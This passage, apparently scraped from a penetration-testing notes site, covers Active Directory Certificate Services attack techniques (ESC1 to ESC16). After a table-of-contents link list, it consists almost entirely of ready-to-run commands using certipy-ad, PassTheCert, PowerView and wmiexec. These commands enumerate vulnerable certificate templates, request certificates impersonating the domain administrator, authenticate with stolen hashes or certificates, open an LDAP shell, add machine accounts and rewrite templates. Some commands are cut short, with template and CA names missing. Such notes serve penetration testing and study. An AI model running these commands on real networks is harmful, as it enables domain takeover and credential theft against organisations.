[KDC\_ERR\_PADATA\_TYPE\_NOSUPP Error](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#kdc_err_padata_type_nosupp-error) * [ESC Attack Techniques](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc-attack-techniques) * [ESC1 - Domain Users Enrollment](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc1-domain-users-enrollment) * [ESC2](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc2) * [ESC3](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc3) * [ESC4](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc4) * [ESC5](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc5) * [ESC6](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc6) * [ESC7](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc7) * [ESC8](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc8) * [ESC9](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc9) * [ESC10](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc10) * [ESC11](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc11) * [ESC13](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc13) * [ESC14](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc14) * [ESC15](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc15) * [ESC16](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#esc16) * [Tools and Resources](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#tools-and-resources) * [Primary Tools](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#primary-tools) * [Useful References](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#useful-references) * [Notes and Best Practices](https://x3m1sec.gitbook.io/notes/pentest-notes/active-directory-pentesting/acds#notes-and-best-practices) Copy certipy-ad find -u user@domain.htb -p 'Password01!' -dc-ip 10.10.10.10 -vulnerable -stdout Copy # Extract private key and certificate from PFX certipy-ad cert -pfx administrator.pfx -nokey -out administrator.crt certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key # Authenticate using PassTheCert python3 /opt/PassTheCert/Python/passthecert.py -action whoami -crt administrator.crt -key administrator.key -domain domain.htb -dc-ip 10.10.10.10 # Get LDAP shell access python3 /opt/PassTheCert/Python/passthecert.py -action ldap-shell -crt administrator.crt -key administrator.key -domain domain.htb -dc-ip 10.10.10.10 Copy # Authentication with credentials certipy-ad req -u user@domain.htb -p "Password01!" -ca -template -upn administrator@domain.htb -dc-ip 10.10.10.10 # Authentication with NTLM hash (Pass-The-Hash) certipy-ad req -u user@domain.htb -hashes '' -ca -template -upn administrator@domain.htb -dc-ip 10.10.10.10 # Kerberos authentication (requires TGT/.ccache file in KRB5CCNAME) certipy-ad req -k -no-pass -ca -template -upn administrator@domain.htb -dc-ip 10.10.10.10 -target dc.domain.htb Copy certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.10.10 -d domain.htb Copy # Add new machine to domain using PowerView powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10 PV > Add-ADComputer -ComputerName Gzzcoo -ComputerPass Gzzcoo123 # Request certificate as machine account certipy-ad req -u 'Gzzcoo$'@domain.htb -p 'Gzzcoo123' -ca -template -upn administrator@domain.htb -dc-ip 10.10.10.10 Copy certipy-ad req -u user@domain.htb -p "Password01!" -ca -template -upn user Copy certipy-ad auth -pfx administrator.pfx -username administrator -dc-ip 10.10.10.10 -d domain.htb Copy KRB5CCNAME=administrator.ccache wmiexec.py domain.htb/administrator@dc.domain.htb -k -no-pass Copy # Request initial certificate certipy-ad req -u user@domain.htb -p "Password01!" -ca -template /altname:administrator@domain.htb # Request certificate impersonating Administrator certipy-ad req -u user@domain.htb -p "Password01!" -ca -template -on-behalf-of 'domain.htb\administrator' -pfx user.pfx Copy # Attack vulnerable ESC4 template certipy-ad template -u 'user@domain.htb' -p 'Password01!' -template -save-old -dc-ip 10.10.10.10 # Verify template modification certipy-ad find -u 'user@domain.htb' -p 'Password01!' -dc-ip 10.10.10.10 -vulnerable -stdout # Abuse modified template certipy-ad req -u 'user@domain.htb' -p 'Password01!' -ca -template -upn Administrator -dc-ip 10.10.10.10 # Get NTLM hash certipy-ad auth -pfx administrator.pfx -domain domain.htb # Restore template to original state certipy-ad template -u 'user@domain.htb' -p 'Password01!' -template -configuration .json Copy # Request Domain Admin certificate certipy-ad req -u 'user@domain.htb' -p 'Password01!' -dc-ip -ns -dns-tcp -target-ip -ca -template